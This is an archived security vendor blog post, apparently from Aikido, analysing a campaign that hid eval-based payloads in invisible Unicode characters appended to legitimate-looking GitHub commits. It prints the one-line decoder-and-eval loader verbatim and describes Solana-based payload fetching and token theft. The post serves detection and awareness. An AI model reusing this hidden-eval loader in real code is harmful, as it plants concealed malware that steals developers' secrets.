{
	"id": "bbc97c07-ba94-4c0f-b943-243e35fee71d",
	"created_at": "2026-04-29T02:20:40.896063Z",
	"updated_at": "2026-04-29T08:21:51.533289Z",
	"deleted_at": null,
	"sha1_hash": "62393c2680106fb560c96b29b8b60bf079563d80",
	"title": "The Return of the Invisible Threat: Hidden PUA Unicode Hits GitHub repositorties",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2584375,
	"plain_text": "The Return of the Invisible Threat: Hidden PUA Unicode Hits GitHub repositories\r\nBy Ilyas Makari\r\nPublished: 2025-10-31 · Archived: 2026-04-29 02:11:37 UTC\r\nIt wasn’t long ago that we uncovered compromised extensions on Open VSX. Now, a new wave of attacks is emerging, and all signs point to the same threat actor.\r\nThe technique will sound familiar: hidden malicious code injected with invisible Unicode Private Use Area (PUA) characters. We first saw this trick back in March when npm packages used PUAs to conceal payloads. Then came Open VSX. Now, the attacker seems to have turned their sights on GitHub, and their methods are evolving. The delivery is getting smarter, stealthier, and a lot more deceptive.\r\nTimeline of the Invisible Code Campaign\r\nMarch – Aikido first discovers malicious npm packages hiding payloads using PUA Unicode characters\r\nMay – We publish a blog detailing the risks of invisible Unicode and how it can be abused in supply chain attacks\r\nOctober 17 – We uncover compromised extensions on Open VSX using the same technique\r\nOctober 18 – Koi Security analyzes the malware and payload, naming it Glassworm\r\nOctober 31 – We discover that the attackers have shifted focus to GitHub repositories\r\nStealth by Design\r\nWe were first alerted to this new wave when a developer reached out after noticing something strange: several of his own GitHub repositories had been updated, by him, at least according to the commit history. The commits looked legitimate. They contained realistic feature updates, small refactors, and even bug fixes that matched the project’s coding style and commit messages. There was one difference: the committer’s email was set to null.
But at the end of these commits, each one had a single, identical addition:\r\nconst d=s=\u003e[...s].map(c=\u003e(c=c.codePointAt(0),c\u003e=0xFE00\u0026\u0026c\u003c=0xFE0F?c-0xFE00:c\u003e=0xE0100\u0026\u0026c\u003c=0xE01EF?c-0xE0100+16:null)).filter(b=\u003eb!==null);eval(Buffer.from(d(``)).toString('utf-8'));\r\nCan you spot the malware? At first glance it's hard to see what's going on, but what sticks out is the eval call, which is often used to execute code dynamically. The input to eval, though, appears to be empty. However, the empty string passed to d() inside the eval is not empty at all. It contains invisible Unicode characters, hidden code encoded with Private Use Area symbols, just like in the previous npm and Open VSX incidents.\r\nhttps://www.aikido.dev/blog/the-return-of-the-invisible-threat-hidden-pua-unicode-hits-github-repositorties\r\nPage 1 of 6\r\nThis time, however, the delivery is far more subtle. Everything has been collapsed into a single line, leaving almost no visual clue. The malicious code is tucked inside what looks like normal project activity, hidden within legitimate commits.\r\nIt’s possible that the benign-looking changes were AI-generated to make the commits more convincing. Since these commits were very project-specific, it suggests the attacker may have leveraged large language models to craft realistic, context-aware code changes, effectively using AI to camouflage their payload within ordinary development activity.\r\nThe decoded PUA characters lead to a script that appears very similar to the Open VSX samples, which suggests we are likely dealing with the same threat actor. The decoded script appears to use Solana as a delivery channel, fetching and executing a payload from the blockchain. Based on the Open VSX incidents, those payloads have been capable of stealing tokens and other secrets.
If credentials or CI tokens are harvested, they could be reused to push the same payload to other repositories, which in turn could enable worm-like propagation as we've seen with previous attacks.\r\nSigns of a Larger Attack\r\nAfter identifying the malicious pattern, we started looking to see if the same payload appeared elsewhere. A quick search on GitHub for the pattern revealed other repositories showing the same suspicious line.\r\nIn these projects, a new commit had been pushed that looked entirely legitimate at first glance. The commits contained normal changes such as documentation updates, version increases, and small code improvements, but each one also included the same hidden payload appended at the end of a file.\r\nFor now, this campaign seems to be limited to JavaScript projects hosted on GitHub. We have not observed any signs of similar compromises in npm or other ecosystems, though we are monitoring it closely since the same attacker may attempt to expand their reach.\r\nEvolving Threats, Smarter Defenses\r\nThese incidents highlight the need for better awareness around Unicode misuse, especially the dangers of invisible Private Use Area characters. Developers can only defend against what they can see, and right now most tools are not showing them enough. Neither GitHub’s web interface nor VS Code displayed any sign that something was wrong. In earlier cases, such as the Open VSX attacks, some IDEs did show subtle indicators next to the hidden characters, but those safeguards were missing here.\r\nWhile this technique is not new, it is clearly evolving. Earlier threats like Shai Hulud simply injected malicious postinstall scripts, making them relatively easy to detect.
Now, attackers are blending malicious code with realistic commits and project-specific improvements, possibly aided by AI to make their changes appear natural. It is a sign of where the threat landscape is heading.\r\nAt Aikido, we are adapting to that same evolution. We use large language models among other detection systems to spot these increasingly subtle threats. As attackers adopt AI to hide their intent, our defenses need to grow just as intelligent to uncover it.\r\nLast updated on: Jan 7, 2026\r\n
Source: https://www.aikido.dev/blog/the-return-of-the-invisible-threat-hidden-pua-unicode-hits-github-repositorties",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.aikido.dev/blog/the-return-of-the-invisible-threat-hidden-pua-unicode-hits-github-repositorties"
	],
	"report_names": [
		"the-return-of-the-invisible-threat-hidden-pua-unicode-hits-github-repositorties"
	],
	"threat_actors": [],
	"ts_created_at": 1777429240,
	"ts_updated_at": 1777450911,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/62393c2680106fb560c96b29b8b60bf079563d80.pdf",
		"text": "https://archive.orkl.eu/62393c2680106fb560c96b29b8b60bf079563d80.txt",
		"img": "https://archive.orkl.eu/62393c2680106fb560c96b29b8b60bf079563d80.jpg"
	}
}